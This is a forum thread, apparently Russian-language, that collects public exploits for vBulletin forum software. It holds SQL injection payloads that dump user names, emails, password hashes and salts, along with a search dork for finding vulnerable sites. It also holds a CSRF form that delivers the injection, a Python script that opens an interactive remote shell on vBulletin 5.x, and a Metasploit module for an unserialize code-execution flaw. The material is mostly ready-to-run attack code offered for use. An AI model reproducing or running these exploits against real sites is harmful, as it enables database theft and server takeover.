#[+] support e-mail  : [Ссылки могут видеть только зарегистрированные пользователи. ]
 
 
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
More info: http://j0hnx3r.org/?p=818
 
--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
 
====================================================================
# 1337day.com [2011-5-21]
====================================================================

Добавлено через 33 секунды

CSRF/XSRF

Код:

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : vBulletin 4.0.x (Search) SQLi via Cross-Site Request Scripting
# Author : KedAns-Dz
# E-mail : [Ссылки могут видеть только зарегистрированные пользователи. ] ([Ссылки могут видеть только зарегистрированные пользователи. ]) | [Ссылки могут видеть только зарегистрированные пользователи. ]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : [Ссылки могут видеть только зарегистрированные пользователи. ] * [Ссылки могут видеть только зарегистрированные пользователи. ] * [Ссылки могут видеть только зарегистрированные пользователи. ]
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote SQL Injection Via Cross-Site Request Scripting (CSRF/XSRF = SQLi)
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]
###
# xXx < Greetings to 'indoushka' at the Jail ... and to his mother 'Rebbi Ya3tik eSber' > xXx
###

# (!) Vulnerability Details :

+> Real Provider By : D4rkB1t ([Ссылки могут видеть только зарегистрированные пользователи. ]) | << Thanks For This Great Vulnerability Br0 (^_^) :)
+> References : [[Ссылки могут видеть только зарегистрированные пользователи. ]
+> Video (By D4rkB1t) : [[Ссылки могут видеть только зарегистрированные пользователи. ]

>> You'r Can use the exploit via Cross-Site Request Scripting or Request Forgery ,
> The vulnerability About (SQLi) in method 'post' at Page Search.php - So he is can able CSRF/XSRF


# Proof Of Concept (f.eg) :

<form action="http://localhost/search.php?do=process" method="post" name="vbform" id="searchform">
<input type="hidden" name="type[]" value="7" />
<input type="hidden" id="keyword" class="textbox" name="query" tabindex="1" value="[! Group Name !]" />
<input type="hidden" name="searchuser" id="userfield_txt" tabindex="1" value="" />
<input type="hidden" name="exactname" value="1" id="cb_exactname" tabindex="1" />
<input type="hidden" class="textbox primary popupctrl" name="tag" id="tag_add_input" tabindex="1" value="" />
<input type="submit" class="button" name="dosearch" value="Search Now" tabindex="1" accesskey="s"/>
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="[ T0ken 4 Security ]" />
<input type="hidden" name="do" value="process" />
<input type="hidden" name="searchthreadid" value="&cat[0]=1) SQLi-Code-Here" />
</form>

POST Data [ HTTP dbg ] =

<!--
type[]=7&query=[Group-Name]&searchuser=&exactname=1&tag=&dosearch=Search+Now
&s=&securitytoken=[Sec-Token]&do=process&searchthreadid=[SQL-Inj3cTi0n-Here]
-->

# (^_^) ! Good Luck ALL ...

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re ([Ссылки могут видеть только зарегистрированные пользователи. ]) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team ([Ссылки могут видеть только зарегистрированные пользователи. ])
# [Ссылки могут видеть только зарегистрированные пользователи. ] * UE-Team ([Ссылки могут видеть только зарегистрированные пользователи. ]) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever 
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================

# 1337day.com [2011-05-23]

[cl0ck]

vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution

PHP код:

# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None

# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.

#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/


#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex

import argparse
import requests
import sys

def run_exploit(vb_loc, shell_cmd):
    post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
    r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
    return r.text

ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()

while True:
    try:
        cmd = input("vBulletin5$ ")
        print(run_exploit(ARGS.location, cmd))
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception as e:
        sys.exit(str(e)) 


[eNets]

vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)

PHP код:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin 5.1.2 Unserialize Code Execution',
      'Description'    => %q{
        This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
      },
      'Platform'       => 'php',
      'License'        => MSF_LICENSE,
      'Author'         => [
          'Netanel Rubin',  # reported by
          'cutz',  # original exploit
          'Julien (jvoisin) Voisin',  # metasploit module
      ],
      'Payload'        =>
        {
          'BadChars'    => "\x22",
        },
      'References'     =>
        [
          ['CVE', '2015-7808'],
          ['EDB', '38629'],
          ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
          ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
        ],
      'Arch'           => ARCH_PHP,
      'Targets'        => [
          [ 'Automatic Targeting', { 'auto' => true }  ],
          ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
          ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
      ],
      'DisclosureDate' => 'Nov 4 2015',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
        ])
  end

  def check
      begin
          res = send_request_cgi({ 'uri' => target_uri.path })
          if (res && res.body.include?('vBulletin Solutions, Inc.'))
              if res.body.include?("Version 5.0")
                  @my_target = targets[1] if target['auto']
                  return Exploit::CheckCode::Appears
              elsif res.body.include?("Version 5.1")
                  @my_target = targets[2] if target['auto']
                  return Exploit::CheckCode::Appears
              else
                  return Exploit::CheckCode::Detected
              end
          end
      rescue ::Rex::ConnectionError
          return Exploit::CheckCode::Safe
      end
  end

  def exploit
    print_status("Trying to inferprint the instance...")

    @my_target = target
    check_code = check

    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("Exploiting #{@my_target.name}...")

    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
    chain << @my_target["chain"].length.to_s
    chain << ':"'
    chain << @my_target["chain"]
    chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
    chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"

    chain = Rex::Text.uri_encode(chain)
    chain = chain.gsub(/%2a/, '%00%2a%00')  # php and Rex disagree on '*' encoding

    send_request_cgi({
        'method' => 'GET',
        'uri'       => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),
        'vars_get' => {
            'arguments' => chain
      },
       'encode_params' => false,
    })
  end
end